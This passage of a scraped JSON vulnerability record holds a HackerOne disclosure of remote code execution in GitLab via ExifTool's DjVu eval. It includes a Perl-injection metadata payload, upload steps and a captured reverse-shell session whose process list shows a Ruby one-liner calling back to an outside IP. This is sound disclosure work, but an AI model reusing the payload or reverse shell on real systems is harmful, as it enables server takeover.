1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T22:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T22:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T22:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQXLPLWLVU%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T222945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIT%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIQCYMUt7KIxY0OIC%2F9GEWrsztT69vFoWTBWyIWvKr1TtIAIgQGC0V2qFvgf9ZCAzzSc2XuI0JE1zimIP83nQ5lx4Yooq%2BgMIHRACGgwwMTM2MTkyNzQ4NDkiDKAxqYrrRDD%2Fn794dyrXA%2BlF8oev2flG7cs8Ml%2BmYJGpzhPOwZnOyNG3wKO5sow%2FrERxcfTTdOn4qUHbtcXWFIcNUAtf1yXSHAhky9b6RuG86P8ReajrtvtXg3kO6xEocS%2FeatlL6pBFhClNMq4comiGdk8xOqbRVocc40nKSgBRFgnVaXNhsdJO0ljfXAqqc6Kn42FytJtt%2Bs41ARGjSwcx1ZKLbd%2BThmC%2Fh5gESHWFszBEC3OTkD18rizM3N4r%2B0zXNVMc0TFrDT8meJODTA3TkCnjdqxp9cnF3PtcY7SMTaCDnysJ86n05I7OehoE8HAeF6rAV0YAZCnFqbOxwhDR5DZJYpyEB%2FItPVO7O610kF9MI7JDXmhNjY0e9bdMZuDAUFJGPjXAP4qBnIKC9%2F8YAAY738%2B6wKN%2BPYNTRPCMyu3kp55GSDAOgMjO7hBReC2es42lIO%2BV9TsTJ7TAZ9AIkmtW8pnvr5g4EPcLOxX5L1Vq9MBiI%2FSwff5kHBGRQiK8GAl3GBWK2p8hbktBE806OSUURK7xgUKbkd3%2FQt%2FDzINblnvUME0k%2BB1FQCo2%2FZMADJOrrCSE7Tc23l4WbVorG5Qxwr7jtQRqCvGi7R0%2BndfbrvZPAVoxaD1GNGb5GOEK1o7KpDCgyYCFBjqlAdxrtC0foTE8HLUh7033QSXDzY%2FQrET5%2Bh8xjrhwyDRPbhW6DXhkhUEKWmHSRcwdkPpdvCKgNejLtK6MAqlsh1i6c48Ix4Md0zxDJV7Ff6ngrvMYAg2Ps7AzajCi%2Fui7RgySccCtvK3UEVon4J2LWSlyNN5ex0i%2BOIdQnqXqZpD5XGE4Qn10gf0gkh3504%2BRz8lGif5DsqdN8QRDqQkge%2FoBTqfFoQ%3D%3D&X-Amz-Signature=ab4ae15c4beedd67637f949b6aaaafb951809bb64dc135c5da889bdc25378744"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T22:29:46", "differentElements": ["h1reporter"], "edition": 27}, {"bulletin": {"id": "H1:1154542", "hash": "8910815a981ff7d17523e4721a0a5ec3", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0